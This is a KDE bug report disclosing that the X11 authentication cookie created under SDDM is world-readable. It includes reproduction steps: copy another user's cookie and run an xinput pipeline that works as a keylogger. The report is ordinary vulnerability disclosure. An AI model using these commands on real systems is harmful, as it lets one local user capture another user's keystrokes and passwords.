https://bugs.kde.org/show_bug.cgi?id=363140
Bug ID: 363140
Summary: World-readable X11 Cookie, easy key logger
Product: www.kde.org
Version: unspecified
Platform: Archlinux Packages
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: NOR
Component: general
Assignee: kde-...@kde.org
Reporter: davidl.rum...@gmail.com
After logging in as any user, you are able to get the X11 cookie and start a
key logger. This has been tested on a F23 system with KDE / SDDM (with current
patches) and a Arch Linux system with KDE / SDDM (plasma-desktop 5.6.4-1).
You are able to easily get the X11 cookie.
$ sha256sum .Xauthority
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8 .Xauthority
$ sha256sum /tmp/xauth-1000-_0
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8
/tmp/xauth-1000-_0
The cookie is world-readable, even if you change the permissions to the cookie,
after a reboot the changes are gone.
$ ls -l /tmp/xauth-1000-_0
-rw-r--r--. 1 sm sm 60 24. Feb 14:04 /tmp/xauth-1000-_0
I have another user that I log via the text console, after that you just need
to start the typical X11 keylogger.
$ cp /tmp/xauth-1000-_0 .Xauthority
$ export DISPLAY=:0
$ xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1
xinput test
Reproducible: Always
Steps to Reproduce:
1. Login via the text console on any user.
2. Copy the X11 cookie over to .Xauthority file for the user you just logged
into.
$ cp /tmp/xauth-1000-_0 .Xauthority
3. Start the typical X11 keylogger.
$ xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1
xinput test
Actual Results:
After running the commands listed in "Steps to Reproduce" section, all the
keyboard pushes are printed to the text console.
Expected Results:
The X11 cookie should not be world-readable.
--
You are receiving this mail because:
You are watching all bug changes.
